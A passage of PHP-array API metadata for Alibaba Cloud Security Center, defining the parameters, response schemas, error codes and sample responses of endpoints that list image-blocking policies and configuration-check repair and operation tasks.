'free'], 'parameters' => [ [ 'name' => 'StrategyName', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The policy name.', 'type' => 'array', 'items' => ['description' => 'The policy name.', 'type' => 'string', 'required' => false, 'example' => 'default', 'title' => ''], 'required' => false, 'maxItems' => 10, 'example' => '', ], ], [ 'name' => 'ImageName', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of image names.', 'type' => 'array', 'items' => ['description' => 'The image name.', 'type' => 'string', 'required' => false, 'example' => 'repo:tag', 'title' => ''], 'required' => false, 'maxItems' => 10, 'example' => '', ], ], [ 'name' => 'Label', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of labels.', 'type' => 'array', 'items' => ['description' => 'The container label.', 'type' => 'string', 'required' => false, 'example' => 'testlabel', 'title' => ''], 'required' => false, 'maxItems' => 10, 'example' => '', ], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PageResult', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The list of policies.', 'type' => 'array', 'items' => [ 'description' => 'The policy object.', 'type' => 'object', 'properties' => [ 'StrategyId' => ['description' => 'The policy ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'StrategyName' => ['description' => 'The policy name.', 'type' => 'string', 'example' => 'auto-strategy-vohuiq', 'title' => ''], 'Description' => ['description' => 'The description.', 'type' => 'string', 'example' => 'Config the Event Audit policys', 'title' => ''], 'UnScanedImage' => ['description' => 'Specifies whether the rule supports unscanned images. Valid values:'."\n" ."\n" .'- **true**: Supported.'."\n" .'- **false**: Not supported.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'MaliciousImage' => ['description' => 'Specifies whether the rule supports Internet malicious images. Valid values:'."\n" ."\n" .'- **true**: Supported.'."\n" .'- **false**: Not supported.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Action' => ['description' => 'The action performed by the policy. Valid values:'."\n" ."\n" .'- **1**: alert'."\n" .'- **2**: block'."\n" .'- **3**: allow.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ClusterCount' => ['description' => 'The number of clusters to which the policy applies.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ClusterIdList' => [ 'description' => 'The list of clusters to which the policy applies.', 'type' => 'array', 'items' => ['description' => 'The cluster to which the policy applies.', 'type' => 'string', 'example' => 'cfb41a8**8a106', 'title' => ''], 'title' => '', 'example' => '', ], 'ImageName' => [ 'description' => 'The image name.', 'type' => 'array', 'items' => ['description' => 'The image name.', 'type' => 'string', 'example' => 'centos', 'title' => ''], 'title' => '', 'example' => '', ], 'Label' => [ 'description' => 'The container label.', 'type' => 'array', 'items' => ['description' => 'The container label.', 'type' => 'string', 'example' => 'alertmanager:main', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '45', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" ."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The result message. Fixed value: **success**. This indicates that the export was successful.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7DFD947C-9172-5129-B783-DD14C55191D2', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve risky image blocking policies', 'summary' => 'Retrieves the list of risky image blocking policies.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOpaClusterStrategyNew'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListOpaClusterStrategyNew', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"StrategyId\\": 1,\\n \\"StrategyName\\": \\"auto-strategy-vohuiq\\",\\n \\"Description\\": \\"Config the Event Audit policys\\",\\n \\"UnScanedImage\\": true,\\n \\"MaliciousImage\\": true,\\n \\"Action\\": 1,\\n \\"ClusterCount\\": 1,\\n \\"ClusterIdList\\": [\\n \\"cfb41a8**8a106\\"\\n ],\\n \\"ImageName\\": [\\n \\"centos\\"\\n ],\\n \\"Label\\": [\\n \\"alertmanager:main\\"\\n ]\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 45,\\n \\"Count\\": 20\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"success\\",\\n \\"RequestId\\": \\"7DFD947C-9172-5129-B783-DD14C55191D2\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ListOperationCheck' => [ 'summary' => 'Query the list of instance results under the operation check item', 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '213426', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'Check item ID.'."\n" .'> Obtain this parameter by calling the [ListCheckResult](~~ListCheckResult~~) interface.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '23', 'title' => ''], ], [ 'name' => 'OperationTaskInstances', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'Information about the operated instances.', 'type' => 'array', 'items' => [ 'description' => 'Instance information.', 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'Asset vendor. Values:'."\n" ."\n" .'- **ALIYUN**: Alibaba Cloud', 'type' => 'string', 'required' => false, 'example' => 'ALIYUN', 'title' => ''], 'RegionId' => ['description' => 'Region ID.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], 'InstanceId' => ['description' => 'Cloud asset instance ID.', 'type' => 'string', 'required' => false, 'example' => 'r-bp1642ib4bg2bm****', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => true, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'Task type corresponding to the task:'."\n" .'- **REPAIR**: Repair task'."\n" .'- **ROLLBACK**: Rollback task', 'type' => 'string', 'required' => true, 'example' => 'REPAIR', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'Timestamp (in milliseconds) of the start time of the queried task.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1719923175000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'Timestamp (in milliseconds) of the end time of the queried task.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1719923175001', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'Language type for request and response messages, default value is zh. Values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The ID of the current call request, which is a unique identifier generated by Alibaba Cloud for the request, and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => 'A3D7C47D-3F11-57BB-90E8-E5C20C61****'], 'OperationTaskInstanceDetails' => [ 'description' => 'Detailed information about the operation instances.', 'type' => 'array', 'items' => [ 'description' => 'Detailed information about the operation instances.', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'Check item ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '58', 'title' => ''], 'InstanceId' => ['description' => 'Instance ID.', 'type' => 'string', 'example' => 'lb-2zefdwrre8ey8ewr0****', 'title' => ''], 'RegionId' => ['description' => 'Region ID.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'Repair' => [ 'description' => 'Information about the repair task.', 'type' => 'array', 'items' => [ 'description' => 'Information about the repair task.', 'type' => 'object', 'properties' => [ 'OperateTime' => ['description' => 'Timestamp for processing the risk. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1719923175000', 'title' => ''], 'RepairConfigs' => [ 'description' => 'Fix the corresponding configuration information.', 'type' => 'array', 'items' => [ 'description' => 'Configuration structure.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'Name of the repair parameter.', 'type' => 'string', 'example' => 'IpList', 'title' => ''], 'TypeDefine' => ['description' => 'JSON string for the custom configuration type of the check item.', 'type' => 'string', 'example' => '{\\"type\\":\\"STRING\\",\\"range\\":[0,64]}', 'title' => ''], 'ShowName' => ['description' => 'Display name.', 'type' => 'string', 'example' => 'IP List', 'title' => ''], 'FlowId' => ['description' => 'ID of the repair process during the repair operation.', 'type' => 'string', 'example' => 'cd7c4d34c1034de08308535d6cee***', 'title' => ''], 'Value' => ['description' => 'Real-time value of the parameter for the instance.', 'type' => 'string', 'example' => '192.168.1XX.1XX', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'StatusShowName' => ['description' => 'Display name of the repair task status.', 'type' => 'string', 'example' => 'repair success verified', 'title' => ''], 'Status' => ['description' => 'Status of the corresponding task.', 'type' => 'string', 'example' => 'REPAIR_SUCCESS_VERIFIED', 'title' => ''], 'TaskId' => ['description' => 'TaskId of the operation task.', 'type' => 'string', 'example' => '6a829841e335b0fb6e0014463284****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Type' => ['description' => 'The operation type of the corresponding task:'."\n" .' - **REPAIR**: Repair task '."\n" .'- **ROLLBACK**: Rollback task', 'type' => 'string', 'example' => 'REPAIR', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'View details of repair or rollback tasks', 'description' => 'This interface is only available to users who have purchased the cloud platform configuration check authorization or enabled the pay-as-you-go service for cloud platform configuration checks.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOperationCheck'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListOperatedCheck', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A3D7C47D-3F11-57BB-90E8-E5C20C61****\\",\\n \\"OperationTaskInstanceDetails\\": [\\n {\\n \\"CheckId\\": 58,\\n \\"InstanceId\\": \\"lb-2zefdwrre8ey8ewr0****\\",\\n \\"RegionId\\": \\"cn-shanghai\\",\\n \\"Repair\\": [\\n {\\n \\"OperateTime\\": 1719923175000,\\n \\"RepairConfigs\\": [\\n {\\n \\"Name\\": \\"IpList\\",\\n \\"TypeDefine\\": \\"{\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"STRING\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"range\\\\\\\\\\\\\\":[0,64]}\\",\\n \\"ShowName\\": \\"IP List\\",\\n \\"FlowId\\": \\"cd7c4d34c1034de08308535d6cee***\\",\\n \\"Value\\": \\"192.168.1XX.1XX\\"\\n }\\n ],\\n \\"StatusShowName\\": \\"repair success verified\\",\\n \\"Status\\": \\"REPAIR_SUCCESS_VERIFIED\\",\\n \\"TaskId\\": \\"6a829841e335b0fb6e0014463284****\\"\\n }\\n ],\\n \\"Type\\": \\"REPAIR\\"\\n }\\n ]\\n}","type":"json"}]', 'translator' => 'machine', ], 'ListOperationProcess' => [ 'summary' => 'Queries a list of operation tasks.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '248180', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'TaskTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The task type. Valid values:'."\n" .'- CHECK_ALL: full check.'."\n" .'- CHECK_POLICY: check performed based on check items in the configured policy.'."\n" .'- CHECK_SCHEDULE: scheduled check.'."\n" .'- CHECK_ITEM: check performed based on specified check items.'."\n" .'- CHECK_INSTANCE: check performed based on specified check items and instances.', 'type' => 'array', 'items' => ['description' => 'The task type.', 'type' => 'string', 'required' => false, 'example' => 'CHECK_POLICY', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page to display in a paged query. This parameter is used for paging.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'StatusCodes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of task status codes.', 'type' => 'array', 'items' => ['description' => 'The check task status code. Valid values:'."\n" ."\n" .'- 0: not started.'."\n" .'- 1: checking.'."\n" .'- 2: check completed.'."\n" .'- 3: timed out.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The start time of the query based on the task creation time. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1680919232000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end time of the query based on the task completion time. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1635575219000', 'title' => ''], ], [ 'name' => 'TaskIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of task IDs.', 'type' => 'array', 'items' => ['description' => 'The task ID.', 'type' => 'string', 'required' => false, 'example' => '3d7a1b68-599f-4e16-9b45-e920a183b***', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'TaskSources', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of task sources.', 'type' => 'array', 'items' => ['description' => 'The task source. Valid values:'."\n" ."\n" .'- **YAO_CHI**: ApsaraDB console.', 'type' => 'string', 'required' => false, 'example' => 'YAO_CHI', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ListOperationProcessResponse', 'type' => 'object', 'properties' => [ 'Processes' => [ 'description' => 'The list of operation task information.', 'type' => 'array', 'items' => [ 'description' => 'The operation task information.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '337', 'title' => ''], 'FinishCount' => ['description' => 'The number of completed items.', 'type' => 'integer', 'format' => 'int32', 'example' => '197', 'title' => ''], 'TaskId' => ['description' => 'The ID of the operation task.', 'type' => 'string', 'example' => '3d7a1b68-599f-4e16-9b45-e920a183b***'."\n", 'title' => ''], 'StatusCode' => ['description' => 'The check task status code. Valid values:'."\n" ."\n" .'- 0: not started.'."\n" .'- 1: checking.'."\n" .'- 2: check completed.'."\n" .'- 3: timed out.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TaskType' => ['description' => 'The task type. Valid values:'."\n" .'- CHECK_ALL: full check.'."\n" .'- CHECK_POLICY: check performed based on check items in the configured policy.'."\n" .'- CHECK_SCHEDULE: scheduled check.'."\n" .'- CHECK_ITEM: check performed based on specified check items.'."\n" .'- CHECK_INSTANCE: check performed based on specified check items and instances.', 'type' => 'string', 'example' => 'CHECK_POLICY', 'title' => ''], 'StartTime' => ['description' => 'The start time of the task. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1705457102000', 'title' => ''], 'EndTime' => ['description' => 'The end time of the task. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1705467559000', 'title' => ''], 'CreateTime' => ['description' => 'The creation time of the task. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1674388824000', 'title' => ''], 'TaskSource' => ['description' => 'The task source. Valid values:'."\n" ."\n" .'- **YAO_CHI**: ApsaraDB.', 'type' => 'string', 'example' => 'YAO_CHI', 'title' => ''], 'DetailTaskTotalCount' => ['description' => 'The total number of subtasks.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'DetailTaskReadyCount' => ['description' => 'The number of completed subtasks.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page to display in a paged query. This parameter is used for paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '263', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'CspmParamIllegal', 'errorMessage' => 'The parameter is not legal. %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query operation tasks', 'description' => 'Currently, only check operation task queries are supported.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOperationProcess'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListOperationProcess', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'OperationProcess', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:operationprocess/{#TaskId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Processes\\": [\\n {\\n \\"TotalCount\\": 337,\\n \\"FinishCount\\": 197,\\n \\"TaskId\\": \\"3d7a1b68-599f-4e16-9b45-e920a183b***\\\\n\\",\\n \\"StatusCode\\": 1,\\n \\"TaskType\\": \\"CHECK_POLICY\\",\\n \\"StartTime\\": 1705457102000,\\n \\"EndTime\\": 1705467559000,\\n \\"CreateTime\\": 1674388824000,\\n \\"TaskSource\\": \\"YAO_CHI\\",\\n \\"DetailTaskTotalCount\\": 10,\\n \\"DetailTaskReadyCount\\": 5\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 263,\\n \\"Count\\": 4\\n },\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\"\\n}","type":"json"}]', ], 'ListOperationProcessDetail' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'abilityTreeCode' => '248213', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'TaskIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of operation task IDs.', 'type' => 'array', 'items' => ['description' => 'The operation task ID.', 'type' => 'string', 'required' => false, 'example' => 'a68478b8-811e-47ec-ab0c-3e5b077ca***', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'StatusCodes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of operation subtask status codes.', 'type' => 'array', 'items' => ['description' => 'The operation subtask status code. Valid values:'."\n" .'- 0: not started.'."\n" .'- 1: checking.'."\n" .'- 2: succeeded.'."\n" .'- 3: timed out.'."\n" .'- 4: failed.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The query start time based on the task creation time, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1731469330000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The query end time based on the task completion time, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1731555850000', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number in a paged query. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ListOperationProcessDetailResponse', 'type' => 'object', 'properties' => [ 'ProcessDetails' => [ 'description' => 'The list of operation subtask information.', 'type' => 'array', 'items' => [ 'description' => 'The operation subtask information.', 'type' => 'object', 'properties' => [ 'AssetVendor' => ['title' => '', 'description' => 'The asset vendor associated with the operation subtask.', 'type' => 'integer', 'format' => 'int32', 'example' => '0'], 'AssetType' => ['title' => '', 'description' => 'The asset type associated with the operation subtask.', 'type' => 'integer', 'format' => 'int32', 'example' => '8'], 'AssetSubType' => ['title' => '', 'description' => 'The asset subtype associated with the operation subtask.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'Checks' => [ 'title' => '', 'description' => 'The list of check items associated with the operation subtask.', 'type' => 'array', 'items' => [ 'description' => 'The check item associated with the operation subtask.', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'The ID of the check item associated with the operation subtask.', 'type' => 'integer', 'format' => 'int64', 'example' => '133', 'title' => ''], 'CheckShowName' => ['description' => 'The name of the check item associated with the operation subtask.', 'type' => 'string', 'example' => 'Check for Security Center Agent Status', 'title' => ''], ], 'title' => '', 'example' => '', ], 'example' => '', ], 'StatusCode' => ['description' => 'The operation subtask status code. Valid values:'."\n" .'- 0: not started.'."\n" .'- 1: checking.'."\n" .'- 2: succeeded.'."\n" .'- 3: timed out.'."\n" .'- 4: failed.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'TaskId' => ['description' => 'The operation subtask ID.', 'type' => 'string', 'example' => 'v34578b8-e567-47ec-2345-3e5b077ca***'."\n", 'title' => ''], 'StartTime' => ['description' => 'The timestamp when the operation subtask started, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1730335622000', 'title' => ''], 'EndTime' => ['description' => 'The timestamp when the operation subtask ended, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1706544199000', 'title' => ''], 'DetailTaskId' => ['description' => 'The operation subtask ID.', 'type' => 'string', 'example' => 'fb4bcd41-a916-46bc-ab1a-65fd383be***', 'title' => ''], 'CreateTime' => ['description' => 'The timestamp when the task was created, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1706544199000', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The page size.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '19', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The unique request ID.', 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F3***', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'CspmParamIllegal', 'errorMessage' => 'The parameter is not legal. %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query operation task subtasks', 'summary' => 'Queries the subtask list of an operation task.', 'description' => 'Currently, only check operation subtask queries are supported.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOperationProcessDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListOperationProcessDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"ProcessDetails\\": [\\n {\\n \\"AssetVendor\\": 0,\\n \\"AssetType\\": 8,\\n \\"AssetSubType\\": 1,\\n \\"Checks\\": [\\n {\\n \\"CheckId\\": 133,\\n \\"CheckShowName\\": \\"Check for Security Center Agent Status\\"\\n }\\n ],\\n \\"StatusCode\\": 0,\\n \\"TaskId\\": \\"v34578b8-e567-47ec-2345-3e5b077ca***\\\\n\\",\\n \\"StartTime\\": 1730335622000,\\n \\"EndTime\\": 1706544199000,\\n \\"DetailTaskId\\": \\"fb4bcd41-a916-46bc-ab1a-65fd383be***\\",\\n \\"CreateTime\\": 1706544199000\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 19,\\n \\"Count\\": 10\\n },\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F3***\\"\\n}","type":"json"}]', ], 'ListOperationTask' => [ 'summary' => 'Display the list of cloud product configuration check, repair, and 